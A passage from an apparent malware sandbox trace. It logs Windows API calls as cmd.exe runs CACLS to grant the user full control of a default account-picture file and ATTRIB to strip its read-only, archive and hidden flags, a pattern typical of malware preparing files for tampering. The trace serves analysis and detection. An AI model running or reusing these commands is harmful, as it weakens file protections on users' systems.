lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x1, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x0, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x4, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x4) returned 0x0 [0181.449] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec3c, lpData=0x1cec40, lpcbData=0x1cec38*=0x1000 | out: lpType=0x1cec3c*=0x0, lpData=0x1cec40*=0x9, lpcbData=0x1cec38*=0x1000) returned 0x2 [0181.449] RegCloseKey (hKey=0x40) returned 0x0 [0181.449] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638f [0181.450] srand (_Seed=0x5b88638f) [0181.450] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" [0181.450] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"" [0181.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.450] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0181.450] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.450] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.450] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0181.450] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0181.450] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0181.451] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0181.451] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0181.451] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0181.451] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0181.451] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0181.451] GetEnvironmentStringsW () returned 0x3b2458* [0181.451] FreeEnvironmentStringsW (penv=0x3b2458) returned 1 [0181.451] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.451] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.451] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0181.451] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0181.451] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0181.451] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0181.451] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0181.451] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0181.451] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa00, lpFilePart=0x1cf9fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf9fc*="Desktop") returned 0x18 [0181.451] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf77c | out: lpFindFileData=0x1cf77c) returned 0x3b0ae8 [0181.452] FindClose (in: hFindFile=0x3b0ae8 | out: hFindFile=0x3b0ae8) returned 1 [0181.452] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0181.452] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0181.452] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0181.452] GetEnvironmentStringsW () returned 0x3b0308* [0181.453] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.453] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.453] GetConsoleOutputCP () returned 0x1b5 [0181.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.453] GetUserDefaultLCID () returned 0x409 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="0") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="0") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb40, cchData=128 | out: lpLCData="1") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0181.454] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0181.455] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0181.456] GetConsoleTitleW (in: lpConsoleTitle=0x3a09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.456] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0181.456] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0181.457] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0181.457] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0181.457] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0181.457] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0181.458] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0181.458] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0181.458] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0181.458] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0181.461] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0181.461] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0181.461] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0181.461] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0181.461] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0181.461] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0181.461] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0181.464] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.546] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.546] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.547] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.547] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.547] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.547] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.547] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.547] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.547] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.547] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.547] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.547] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.547] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.547] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0181.547] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0181.547] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0181.547] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0181.547] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0181.547] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0181.547] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0181.548] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0181.548] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0181.548] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0181.548] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0181.548] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0181.548] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0181.548] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0181.548] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0181.548] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0181.548] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0181.548] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0181.548] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0181.548] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0181.548] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0181.548] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0181.548] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0181.548] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0181.548] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0181.548] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0181.548] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0181.549] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0181.549] SetErrorMode (uMode=0x0) returned 0x0 [0181.549] SetErrorMode (uMode=0x1) returned 0x0 [0181.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b1e98, lpFilePart=0x1cf2f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf2f4*="Desktop") returned 0x18 [0181.549] SetErrorMode (uMode=0x0) returned 0x1 [0181.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.554] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3b2180 [0181.555] FindClose (in: hFindFile=0x3b2180 | out: hFindFile=0x3b2180) returned 1 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.555] GetLastError () returned 0x2 [0181.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3b2180 [0181.555] FindClose (in: hFindFile=0x3b2180 | out: hFindFile=0x3b2180) returned 1 [0181.556] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.556] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.556] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.556] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf3f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf4b8 | out: lpAttributeList=0x1cf3f0, lpSize=0x1cf4b8) returned 1 [0181.556] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf3f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf4b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf3f0, lpPreviousValue=0x0) returned 1 [0181.556] GetStartupInfoW (in: lpStartupInfo=0x1cf3ac | out: lpStartupInfo=0x1cf3ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.556] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.557] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf44c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf498 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf498*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcd0, dwThreadId=0xc98)) returned 1 [0181.559] CloseHandle (hObject=0x4c) returned 1 [0181.559] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0181.559] GetEnvironmentStringsW () returned 0x3b0308* [0181.559] FreeEnvironmentStringsW (penv=0x3b0308) returned 1 [0181.559] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0181.779] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf38c | out: lpExitCode=0x1cf38c*=0x0) returned 1 [0181.779] CloseHandle (hObject=0x50) returned 1 [0181.779] _vsnwprintf (in: _Buffer=0x1cf4d4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf398 | out: _Buffer="00000000") returned 8 [0181.779] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0181.779] GetEnvironmentStringsW () returned 0x3b2410* [0181.779] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.779] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0181.779] GetEnvironmentStringsW () returned 0x3b2410* [0181.779] FreeEnvironmentStringsW (penv=0x3b2410) returned 1 [0181.779] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf3f0 | out: lpAttributeList=0x1cf3f0) [0181.779] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.780] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.780] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0181.780] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.780] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.780] GetLastError () returned 0x2 [0181.780] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.781] GetLastError () returned 0x2 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3ae4d8 [0181.781] FindClose (in: hFindFile=0x3ae4d8 | out: hFindFile=0x3ae4d8) returned 1 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0xffffffff [0181.781] GetLastError () returned 0x2 [0181.781] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cf070, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf070) returned 0x3ae4d8 [0181.781] FindClose (in: hFindFile=0x3ae4d8 | out: hFindFile=0x3ae4d8) returned 1 [0181.781] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0181.781] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0181.781] GetConsoleTitleW (in: lpConsoleTitle=0x1cf568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.782] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf3f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf4b8 | out: lpAttributeList=0x1cf3f0, lpSize=0x1cf4b8) returned 1 [0181.782] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf3f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf4b0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf3f0, lpPreviousValue=0x0) returned 1 [0181.782] GetStartupInfoW (in: lpStartupInfo=0x1cf3ac | out: lpStartupInfo=0x1cf3ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0181.782] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0181.782] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf44c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf498 